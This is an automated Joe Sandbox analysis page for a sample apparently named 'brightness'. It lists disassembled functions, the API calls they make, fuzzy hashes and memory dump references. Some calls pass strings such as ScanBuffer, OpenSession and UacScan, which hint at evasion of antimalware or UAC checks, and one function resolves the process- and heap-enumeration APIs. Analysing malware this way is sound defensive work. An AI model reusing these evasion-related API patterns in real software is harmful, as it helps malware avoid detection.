Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: f877975fa87ccba536a425f9debfebd07166928471eb42d7f833f6b008b16f39
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: CCD05BBA3091107AD220955E5C44EFB5BDCCFC9770F100639B658C7180E720CC0187F1

Function 02837E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0284FD00,ScanString,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanString,0289237C,0285B40C,UacScan,0289237C,0285B40C,UacInitialize), ref: 02837E1B

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction ID: 888b2f911c2d32968220aa00c486c93f32c32a3d68e831370272ae0ad13fe476
Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction Fuzzy Hash: 5EC08CED2122020A1A52B1FC0CC402A42C809042393A42F31E63CEA2E2E321C82324A1

Function 02837E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02852E7D,ScanString,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,Initialize), ref: 02837E3F

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction ID: 76059ebc11ee8401f8683305297ba802bd65900f1dd1042b8634e608cd3402b1
Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction Fuzzy Hash: ACC08CED2122040E1E52E2FC0CC450A42CC09046393A02F31E53CDA2E2E321D8622491

Function 02834C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02834C37

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction ID: 7cf37c1e76d34f1bce963bfff58f4292094a55caff62089ca9f5a59a99ce1fcc
Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction Fuzzy Hash: 6DC012AE60022447FF229A989CC075562CCEB05295B1400A1D40CD7240E3B49C0156E5

Function 02834C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0284ED84), ref: 02834C1A
SysReAllocStringLen.OLEAUT32(0285C2B4,0284ED84,000000B4), ref: 02834C62

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction ID: 9eb8f0d25c0c72e60c123b2d12f4de6d0a40da9955d506ed0d59a11c91ee340b
Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction Fuzzy Hash: EBD0807C5001055DBF2FDD994544937736AA9D130A34CC25DDC0ECA241EB75DC02CAF1

Function 0285BF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,0285BF78,00000000,00000001), ref: 0285BF94

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 4ed03842f9f6df0c5862ce3d97bd7647f707e14d41a9f696af56e1e21336e4ff
Instruction ID: 8c5a73d0c0865a95cd4914eaa6dcba166fa955e19a2201d57a0ae3c26ad6782f
Opcode Fuzzy Hash: 4ed03842f9f6df0c5862ce3d97bd7647f707e14d41a9f696af56e1e21336e4ff
Instruction Fuzzy Hash: 76C048F87883407AFA1096A92CC2F77218DD714B02F200452BA04EE2C1D1E268544A61

Function 02834BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02834BEB

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction ID: 6509dee010251f01cfc184e5feb2af88e33aaa63dd58c7db93f591a5f53f2779
Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction Fuzzy Hash: 93B0123C24820618FA5355E10D00BB2008C5B5168BF8400919E2CC80C0FF41C41088F3

Function 02834BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02834C03

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: b03e69c5882025466abdee8b3d23e60f75a20912e9bd04f326fd0dcdb862c15a
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: ABA022AC0003030AAF0B232C000002A20333FE0B023CAC0E88008CA0008F3EC000ACF0

Function 028315CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02831A03), ref: 028315E2

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 757aad050b1064b48ec3ffb949c423d6c60b4bb8d12220f76193fe4448917c0c
Instruction ID: d0e962ba5ba1ab034e955da970df5e909211dc3479763dc96af6461aa38dcffc
Opcode Fuzzy Hash: 757aad050b1064b48ec3ffb949c423d6c60b4bb8d12220f76193fe4448917c0c
Instruction Fuzzy Hash: CCF037F8B413404BEB06EF7D9D443016AD2EB89344FA08579E709DB6D8E77184018B40

Function 02831682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028316A4

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fe3f1458e49eb9cba1da7c7d47fd85667bc3b366002071c6cd7908b9836f0478
Instruction ID: d3c8e870b309ccaca05dab0584fe9bb644475fa796e61877e399880eb4856db2
Opcode Fuzzy Hash: fe3f1458e49eb9cba1da7c7d47fd85667bc3b366002071c6cd7908b9836f0478
Instruction Fuzzy Hash: 85F0F0BAB446967BD7118E4A9C88782BBA4FB40710F080139EA0CD7384D7B1A8108BD4

Function 028316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02831FE4), ref: 02831704

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8e37bbc273c8e106f38e8c04c59a84e340d840955f95363e4c0d39e49d883ea3
Instruction ID: 7c38089a4a18ed5d31ab8f6eccf65e2d08a9a963bd354b6dae0ab30df65181cf
Opcode Fuzzy Hash: 8e37bbc273c8e106f38e8c04c59a84e340d840955f95363e4c0d39e49d883ea3
Instruction Fuzzy Hash: A9E0CD7D3003016FD7115B7D5D88712BBDCEB44A54F184875F50DDB285D760E8108BA0

Non-executed Functions

Function 0284A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0284ABDB,?,?,0284AC6D,00000000,0284AD49), ref: 0284A968
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0284A980
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0284A992
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0284A9A4
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0284A9B6
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0284A9C8
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0284A9DA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0284A9EC
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0284A9FE
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0284AA10
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0284AA22
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0284AA34
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0284AA46
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0284AA58
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0284AA6A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0284AA7C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0284AA8E

Strings

Toolhelp32ReadProcessMemory, xrefs: 0284A9D2
Heap32Next, xrefs: 0284A9C0
Heap32First, xrefs: 0284A9AE
Module32First, xrefs: 0284AA50
Process32Next, xrefs: 0284A9F6
Heap32ListFirst, xrefs: 0284A98A
Process32First, xrefs: 0284A9E4
Module32NextW, xrefs: 0284AA86
kernel32.dll, xrefs: 0284A963
Module32FirstW, xrefs: 0284AA74
Thread32First, xrefs: 0284AA2C
CreateToolhelp32Snapshot, xrefs: 0284A978
Module32Next, xrefs: 0284AA62
Process32NextW, xrefs: 0284AA1A
Heap32ListNext, xrefs: 0284A99C
Process32FirstW, xrefs: 0284AA08
Thread32Next, xrefs: 0284AA3E

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: e9ca47494e3935ca2c4763dc7fc268cb433c8b9db14ddabbd40cc825e492b092
Instruction ID: 034577f44f8f5f93fa7220730226bee43f3a9e586e606f961c2654cf8b209e2d
Opcode Fuzzy Hash: e9ca47494e3935ca2c4763dc7fc268cb433c8b9db14ddabbd40cc825e492b092
Instruction Fuzzy Hash: 5531A2BCAC1B24BFFB46DFBCD8B5A263799AB057407040965A401CF249FB7898108F96

Function 028358B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02836BC8,02830000,0285E790), ref: 028358D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028358E8
lstrcpynA.KERNEL32(?,?,?), ref: 02835918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02836BC8,02830000,0285E790), ref: 0283597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02836BC8,02830000,0285E790), ref: 028359B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02836BC8,02830000,0285E790), ref: 028359C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02836BC8,02830000,0285E790), ref: 028359D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02836BC8,02830000,0285E790), ref: 028359E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02836BC8,02830000), ref: 02835A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02836BC8), ref: 02835A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02835A45

Strings

kernel32.dll, xrefs: 028358CC
\, xrefs: 028359F5
GetLongPathNameA, xrefs: 028358DF

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 20ad37e2dbd9a3ff8bb3c1239f3378d64f7da3c2bd0328ea6728ccfc9bc961a5
Instruction ID: 5f0444033f0d6f84729ad0c1e8e34a4898fa5da764bb589bd3a6c8b594ade00d
Opcode Fuzzy Hash: 20ad37e2dbd9a3ff8bb3c1239f3378d64f7da3c2bd0328ea6728ccfc9bc961a5
Instruction Fuzzy Hash: 3C417F7DD00259AFDB12DAE8CC88ADEB3BEAF08310F4449A5E548E7241D7789B448F90

Function 02835B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02835B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02835BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02835BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02835BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02835C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02835C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02835C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02835C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02835C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02835C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02835AE4
Software\Borland\Locales, xrefs: 02835AA8, 02835AC6

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 5efa9141af3549a2ba4bd5d42b49473f5464057f95c0b49fe51c84800509317d
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 1B31C77DE4021C6AFB27D6B89C49FDFB7AD5B04784F4405E19608E6080DB789E448FD1

Function 0285D367 Relevance: 2.4, Strings: 1, Instructions: 1187COMMON

Download Yara Rule

Strings

, xrefs: 0285E04C

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-3916222277
Opcode ID: d86a8d5901031c729a974c9791b2ec02ef4c7d2533c35cd45cd3e08fe7d6566e
Instruction ID: d217e481be03d946acdd3f289ef4520006780076a529d6cb5b086da579aaf631
Opcode Fuzzy Hash: d86a8d5901031c729a974c9791b2ec02ef4c7d2533c35cd45cd3e08fe7d6566e
Instruction Fuzzy Hash: 90715D7A8093E18FCB138F78C899695BFB0BF17220B4D01DAC8958F1A7E7605566CB46

Function 02837F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02837F75

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction ID: b06386c511158317b7aabc4d07c5ed1d82510120be8c4906911168df02c606e4
Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction Fuzzy Hash: DC1100B5A00209AFDB05CF9DC8809AFF7F9FFCC304B14C569A508EB254E6319A01CB90

Function 0283A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0283A762

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction ID: 297f85a4d7cf1f19c4701c5cefc84f56e1f07bc821cf3e3575b4ebb91ba9156b
Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction Fuzzy Hash: 42E0D83EB0021827D316A56C9C819F6735D975C350F00427EBD49C7341FDA09D404EE9

Function 0283B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,0285D106,00000000,0285D11E), ref: 0283B71A

